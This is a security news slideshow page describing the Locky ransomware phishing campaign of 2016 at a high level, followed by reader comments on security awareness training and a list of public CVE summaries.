Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

News

4/9/2016
08:00 AM
Steve Zurier
Steve Zurier
Slideshows
Connect Directly
Twitter
RSS
E-Mail

The 8 Most Convincing Phishing Schemes Of 2016

The year is young and high-profile phishing attacks keep coming seemingly every week. Here are eight reasons why security pros have to get serious about combating phishing.
2 of 9

Locky

On February 16 of this year, PhishMe's intelligence team identified a number of significantly large sets of emails that delivered Word documents containing macro scripts used to download malware. PhishMe says this common malware technique and has been used by groups delivering the Dridex Trojan. 

But this encryption ransomware was something new, referring to itself as Locky. One important difference was that it broke from the exclusive use of Visual Basic scripting. Instead, Locky used a PowerShell script to download and execute the malware.

Palo Alto Networks reports that more than 400,000 endpoints around the world were affected by Locky in a matter of hours.

While there are clear differences, PhishMe adds that the similarity of the messages and the OfficeMacro documents used to deliver Locky and those used to deliver Dridex is striking. Even the payload URLs were constructed in a way that resembles the naming convention used to deliver Dridex.

Image Source: PhishMe, Dark Reading

Locky

On February 16 of this year, PhishMes intelligence team identified a number of significantly large sets of emails that delivered Word documents containing macro scripts used to download malware. PhishMe says this common malware technique and has been used by groups delivering the Dridex Trojan.

But this encryption ransomware was something new, referring to itself as Locky. One important difference was that it broke from the exclusive use of Visual Basic scripting. Instead, Locky used a PowerShell script to download and execute the malware.

Palo Alto Networks reports that more than 400,000 endpoints around the world were affected by Locky in a matter of hours.

While there are clear differences, PhishMe adds that the similarity of the messages and the OfficeMacro documents used to deliver Locky and those used to deliver Dridex is striking. Even the payload URLs were constructed in a way that resembles the naming convention used to deliver Dridex.

Image Source: PhishMe, Dark Reading

2 of 9
Comment  | 
Print  | 
Comments
Newest First  |  Oldest First  |  Threaded View
nathanwburke
100%
0%
nathanwburke,
User Rank: Author
4/13/2016 | 6:17:55 AM
Re: These problems were all preventable
Security awareness training can help, but that is also just one piece of a comprehensive security plan that includes the triumvirate of People, Process and Technology. Security awareness training can help with the People component, making employees more cognizant of the low-level, commodity attacks that use emails with attachments and links to compromised sites. 

However, this only applies to the obvious. Don't download and run applications from attachments. Don't click links in emails from people you don't know.  The problem is that many attacks are more sophisticated. In some cases, the phishing attack comes from a compromised email address using language that mimics the hacked sender. In those cases, all of the awareness training available will likely fail.

Creating a Process for flagging potentially malicious activity and quickly removing any threat organization-wide is key to reducing risk of threats introduced accidentally (despite awareness training). Having Technology in place to identify and remediate obvious threats is essential to keeping this process timely and scalable.

Awareness training is important, but simply telling people not to do the obvious isn't enough anymore.
Dan Euritt
50%
50%
Dan Euritt,
User Rank: Apprentice
4/11/2016 | 10:39:10 AM
These problems were all preventable
All companies should be conducting awareness training on these issues, and this article looks like a great place to start. Thanks for posting it up.
DevSecOps: The Answer to the Cloud Security Skills Gap
Lamont Orange, Chief Information Security Officer at Netskope,  11/15/2019
Attackers' Costs Increasing as Businesses Focus on Security
Robert Lemos, Contributing Writer,  11/15/2019
Register for Dark Reading Newsletters
White Papers
Video
Cartoon Contest
Current Issue
Navigating the Deluge of Security Data
In this Tech Digest, Dark Reading shares the experiences of some top security practitioners as they navigate volumes of security data. We examine some examples of how enterprises can cull this data to find the clues they need.
Flash Poll
Rethinking Enterprise Data Defense
Rethinking Enterprise Data Defense
Frustrated with recurring intrusions and breaches, cybersecurity professionals are questioning some of the industrys conventional wisdom. Heres a look at what theyre thinking about.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2019-19037
PUBLISHED: 2019-11-21
ext4_empty_dir in fs/ext4/namei.c in the Linux kernel through 5.3.12 allows a NULL pointer dereference because ext4_read_dirblock(inode,0,DIRENT_HTREE) can be zero.
CVE-2019-19036
PUBLISHED: 2019-11-21
btrfs_root_node in fs/btrfs/ctree.c in the Linux kernel through 5.3.12 allows a NULL pointer dereference because rcu_dereference(root->node) can be zero.
CVE-2019-19039
PUBLISHED: 2019-11-21
__btrfs_free_extent in fs/btrfs/extent-tree.c in the Linux kernel through 5.3.12 calls btrfs_print_leaf in a certain ENOENT case, which allows local users to obtain potentially sensitive information about register values via the dmesg program.
CVE-2019-6852
PUBLISHED: 2019-11-20
A CWE-200: Information Exposure vulnerability exists in Modicon Controllers (M340 CPUs, M340 communication modules, Premium CPUs, Premium communication modules, Quantum CPUs, Quantum communication modules - see security notification for specific versions), which could cause the disclosure of FTP har...
CVE-2019-6853
PUBLISHED: 2019-11-20
A CWE-79: Failure to Preserve Web Page Structure vulnerability exists in Andover Continuum (models 9680, 5740 and 5720, bCX4040, bCX9640, 9900, 9940, 9924 and 9702) , which could enable a successful Cross-site Scripting (XSS attack) when using the products web server.